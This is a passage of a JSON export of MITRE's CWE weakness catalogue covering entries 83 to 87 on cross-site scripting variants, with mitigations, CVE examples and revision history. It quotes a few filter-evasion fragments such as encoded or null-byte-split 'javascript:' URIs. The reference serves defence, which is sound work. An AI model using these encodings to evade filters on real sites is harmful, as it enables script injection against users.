Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Script in IMG Tags","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script in Attributes of IMG Tags in a Web Page","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script in Attributes of IMG Tags in a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"83":{"attr":{"@_ID":"83","@_Name":"Improper Neutralization of Script in Attributes in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes \\"javascript:\\" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0520","Description":"Bypass filtering of SCRIPT tags using onload in BODY, href in A, BUTTON, INPUT, and others.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0520"},{"Reference":"CVE-2002-1493","Description":"guestbook XSS in STYLE or IMG SRC attributes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1493"},{"Reference":"CVE-2002-1965","Description":"Javascript in onerror attribute of IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1965"},{"Reference":"CVE-2002-1495","Description":"XSS in web-based email product via onmouseover event.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495"},{"Reference":"CVE-2002-1681","Description":"XSS via script in <P> tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1681"},{"Reference":"CVE-2004-1935","Description":"Onload, onmouseover, and other events in an e-mail attachment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1935"},{"Reference":"CVE-2005-0945","Description":"Onmouseover and onload events in img, link, and mail tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0945"},{"Reference":"CVE-2003-1136","Description":"Javascript in onmouseover attribute in e-mail address or URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS using Script in Attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"243"}},{"attr":{"@_CAPEC_ID":"244"}},{"attr":{"@_CAPEC_ID":"588"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS using Script in Attributes","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script in Attributes in a Web Page","attr":{"@_Date":"2010-04-05"}}]}},"84":{"attr":{"@_ID":"84","@_Name":"Improper Neutralization of Encoded URI Schemes in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Resolve all URIs to absolute or canonical representations before processing."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0563","Description":"Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL (\\"jav&#X41sc&#0010;ript:\\") in an IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0563"},{"Reference":"CVE-2005-2276","Description":"Cross-site scripting (XSS) vulnerability in Novell Groupwise WebAccess 6.5 before July 11, 2005 allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an encoded javascript URI (e.g. \\"j&#X41vascript\\" in an IMG tag).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2276"},{"Reference":"CVE-2005-0692","Description":"Encoded script within BBcode IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0692"},{"Reference":"CVE-2002-0117","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0117"},{"Reference":"CVE-2002-0118","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0118"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS using Script Via Encoded URI Schemes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS using Script Via Encoded URI Schemes","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Encoded URI Schemes in a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"85":{"attr":{"@_ID":"85","@_Name":"Doubled Character XSS Manipulations","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"675","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Resolve all filtered input to absolute or canonical representations before processing."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2086","Description":"XSS using \\"<script\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086"},{"Reference":"CVE-2000-0116","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116"},{"Reference":"CVE-2001-1157","Description":"Extra \\"<\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"DOUBLE - Doubled character XSS manipulations, e.g. \\"<script\\""},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"245"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"86":{"attr":{"@_ID":"86","@_Name":"Improper Neutralization of Invalid Characters in Identifiers in Web Pages","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers.","Extended_Description":"Some web browsers may remove these sequences, resulting in output that may have unintended control implications. For example, the software may attempt to remove a \\"javascript:\\" URI scheme, but a \\"java%00script:\\" URI may bypass this check and still be rendered as active javascript by some browsers, allowing XSS or other attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-0595","Description":"XSS filter doesn\'t filter null characters before looking for dangerous tags, which are ignored by web browsers. Multiple Interpretation Error (MIE) and validate-before-cleanse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Invalid Characters in Identifiers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"247"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Invalid Characters in Identifiers","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Invalid Characters in Identifiers in Web Pages","attr":{"@_Date":"2010-04-05"}}]}},"87":{"attr":{"@_ID":"87","@_Name":"Improper Neutralization of Alternate XSS Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Resolve all input to absolute or canonical representations before processing."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-141"},"Intro_Text":"In the following example, an XSS neutralization method intends to replace script 